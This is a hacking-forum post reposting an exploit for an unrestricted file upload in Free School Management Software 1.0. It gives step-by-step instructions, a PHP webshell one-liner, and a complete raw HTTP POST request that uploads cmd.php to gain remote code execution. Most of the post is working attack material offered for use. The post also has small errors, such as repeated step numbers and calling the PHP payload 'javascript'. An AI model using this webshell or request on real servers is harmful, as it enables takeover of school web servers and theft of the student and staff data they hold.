Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Free School Management Software 1.0 - Remote Code Execution (RCE)

 Share


HACK1949

Recommended Posts

# Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)
# Exploit Author: fuuzap1
# Date: 7-12-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip
# Version: 1.0
# Tested on: windows
# Vulnerable page: http://localhost/admin/examQuestion


Technical description:
A unrestricted file upload vulnerability exists in the Free school
management software v1.0. An attacker can leverage this vulnerability in
order to get a remote code execution on the affected web server. Once a php
webshell containing "<?php system($_GET["cmd"]); ?>"  gets uploaded it is
getting save  into /uploads/exam_question/ directory, and is accessible by
all users.  the attacker can gain remote code execution on the web server.

Steps to exploit:
1) Navigate to http://localhost/admin/manage_profile
2) click "ADD NEW QUESTION PAPER" edit base infomation
3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in
the Field  "upload Drag and drop a file here or click"
3) Click "save"
4) open  http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then
php code execution
Proof of concept (Poc):
The following payload will allow you to run the javascript -
<?php system($_GET["cmd"]); ?>

---
POST /admin/examQuestion/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------183813756938980137172117669544
Content-Length: 1331
Origin: http://localhost
Connection: close
Referer: http://localhost/admin/examQuestion
Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q
Upgrade-Insecure-Requests: 1

-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="name"

test4
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="class_id"

2
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="subject_id"

5
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="timestamp"

2021-12-08
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="teacher_id"

1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_type"

txt
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="status"

1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="description"

123123
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="_wysihtml5_mode"

1
-----------------------------183813756938980137172117669544
Content-Disposition: form-data; name="file_name"; filename="cmd.php"
Content-Type: application/octet-stream

<?php eval($_GET["cmd"]); ?>
-----------------------------183813756938980137172117669544--
---
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...